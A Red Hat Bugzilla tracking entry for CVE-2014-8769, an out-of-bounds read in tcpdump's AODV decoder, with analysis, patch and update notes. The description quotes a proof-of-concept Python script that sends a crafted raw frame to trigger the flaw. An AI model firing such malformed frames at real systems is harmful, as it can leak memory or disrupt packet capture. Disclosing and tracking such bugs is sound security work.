Bug 1165162 (CVE-2014-8769)

Summary: CVE-2014-8769 tcpdump: unreliable output using malformed AOVD payload
Product: [Other] Security Response Reporter: Vasyl Kaigorodov <vkaigoro>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED WONTFIX QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: athmanem, carnil, msekleta, sardella, sisharma
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: tcpdump 4.7.0 Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2021-06-14 15:04:04 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 1165167    
Bug Blocks: 1165164    
Attachments:
Description Flags
Fix_uncheck_length_patch_from_debian_bug none

Description Vasyl Kaigorodov 2014-11-18 13:26:02 UTC 
Following issue was reported in [1]:
...
The application decoder for the Ad hoc On-Demand Distance Vector (AODV) protocol fails to perform input validation and performs unsafe out-of-bound accesses. The application will usually not crash, but perform out-of-bounds accesses and output/leak larger amounts of invalid data, which might lead to dropped packets. It is unknown if other payload exists that might trigger segfaults.

To reproduce start tcpdump on a network interface

   sudo tcpdump -i lo -s 0 -n -v

(running the program with sudo might hide a possible segfault message on certain environments, see dmesg for details)
and use the following python program to generate a frame on the network (might also need sudo):

#!/usr/bin/env python
    from socket import socket, AF_PACKET, SOCK_RAW
    s = socket(AF_PACKET, SOCK_RAW)
    s.bind(("lo", 0))
    aovd_frame = "\x00\x00\x00\x00\x00\x00\x00\x00\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\x8e\x0d\x00\x4b\x00\x00\xe8\x12\x00\x00\x00\x00\x1f\xc6\x51\x35\x97\x00\x24\x8c\x7a\xdf\x6f\x08\x00\x45\x00\xe6\x3d\xf3\x7f\x40\x00\x40\x11\x30\xc6\x0a\x01\x01"
    s.send(aovd_frame)

Affected versions are 3.8 through 4.6.2
...

[1]: http://seclists.org/bugtraq/2014/Nov/88
Comment 1 Vasyl Kaigorodov 2014-11-18 13:31:39 UTC 
Created tcpdump tracking bugs for this issue:

Affects: fedora-all [bug 1165167]
Comment 3 Siddharth Sharma 2014-11-25 16:56:32 UTC 
Created attachment 961288 [details]
Fix_uncheck_length_patch_from_debian_bug
Comment 5 Siddharth Sharma 2014-11-28 09:10:04 UTC 
Analysis
========

In function udp_print(register const u_char *bp, u_int length, register const u_char *bp2, int fragmented) the value of argument length is not checked properly, which results in the crash of the tcpdump when trying to print data from the malformed AOVD payload.
Comment 6 Fedora Update System 2014-12-04 06:25:54 UTC 
tcpdump-4.4.0-4.fc19 has been pushed to the Fedora 19 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 7 Fedora Update System 2014-12-06 10:25:44 UTC 
tcpdump-4.6.2-2.fc21 has been pushed to the Fedora 21 stable repository.  If problems still persist, please make note of it in this bug report.
Comment 8 Siddharth Sharma 2015-04-30 07:53:43 UTC 
Statement:

Red Hat Product Security has rated this issue as having low security impact, a future update may address this flaw in tcpdump.
Comment 9 Product Security DevOps Team 2021-06-14 15:04:04 UTC 
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2014-8769